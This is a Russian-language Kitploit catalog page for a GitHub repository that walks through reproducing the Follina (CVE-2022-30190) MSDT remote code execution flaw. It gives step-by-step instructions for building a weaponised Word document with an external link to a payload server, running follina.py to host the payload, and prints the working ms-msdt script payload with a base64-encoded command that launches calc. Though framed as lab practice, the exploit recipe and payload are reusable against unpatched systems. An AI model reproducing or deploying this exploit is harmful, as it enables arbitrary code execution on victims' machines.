Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-30190 — Пошаговое руководство по воспроизведению уязвимости удаленного выполнения кода CVE-2022-30190 (Follina) MSDT, включая создание вредоносного документа и настройку C2-сервера. | Kitploit
Инструменты/GitHubGitHub/yrkuo/cve-2022-30190
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбучение и ОбразованиеЛаборатории и Практика
GitHubyrkuo/cve-2022-30190

CVE-2022-30190

Пошаговое руководство по воспроизведению уязвимости удаленного выполнения кода CVE-2022-30190 (Follina) MSDT, включая создание вредоносного документа и настройку C2-сервера.

Репозиторий
13 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-30190

также известная как Follina

Описание уязвимости

Follina существует в средстве диагностики поддержки Microsoft (Microsoft Support Diagnostic Tool, MSDT). Когда приложение вызывает MSDT через протокол URL для поддержки, возникает уязвимость удаленного выполнения кода. Успешная эксплуатация позволяет злоумышленнику выполнить произвольный код с правами запущенного приложения.

Среда воспроизведения уязвимости

root@kitploit:~
* Host OS: Ubuntu 22.04 LST
* Guest OS: Windows 10 Pro x64, version 2004, build 19041.1237
* Microsoft office: word 2016

Процесс воспроизведения

Создание вредоносного документа

Шаг 1 Создайте Word-документ (.docx) и вставьте в него OLE-объект (например, Bitmap Image)
Шаг 2 Распакуйте .docx файл, отредактируйте файл word/_rels/document.xml.rels в папке, измените выделенное желтым на рисунке ниже значение Target="embeddings/oleObject1.bin" на и добавьте атрибут . Шаг 3 Отредактируйте файл в папке, измените выделенное желтым на рисунке ниже значение на и добавьте атрибут . Шаг 4 Используйте 7-zip, чтобы открыть .docx файл (не распаковывая) и поместите два указанных файла обратно в .docx. Вредоносный документ готов.

Target = "http://<payload_server>/<random_name>.html!"
TargetMode = "External"

rels

word/document.xml
Type="Embed"
Type="Link"
UpdateMode="OnCall"

doc

Настройка C2-сервера

Скачайте Follina.py, опубликованный John Hammond. Здесь в качестве примера используется простой вызов калькулятора: python3 follina.py -c calc.exe -i eth0

ПРИМЕЧАНИЕ

В файле Follina.py строки 117-125 отвечают за создание вредоносной полезной нагрузки (.html). Содержание: <script>location.href... — это скрипт, который запускает калькулятор на машине жертвы. Весь файл также заполняется большим количеством случайных символов, чтобы его размер составлял минимум 4096 байт. Причину можно узнать по ссылке “Follina” MSDT Attack

root@kitploit:~
<script>location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'Y2FsYw=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\""; //pydvwofyowvcmgcaevgukzhjgmfirqpffuiclrgzlobvnrxknespfklndldfazyefpyxjbixgykmzeumodxedsxpaduvcqygjhrxzeqpuhdgcmpzsxkkpdzdielmoiwzknqxtxinxymsnuugffkxvzwxetrl...(4096 bytes)
</script

Справочные материалы

Новостная статья Follina.py
malicious document
Тест уязвимости 1
Тест уязвимости 2
Тест уязвимости 3

Скачать инструмент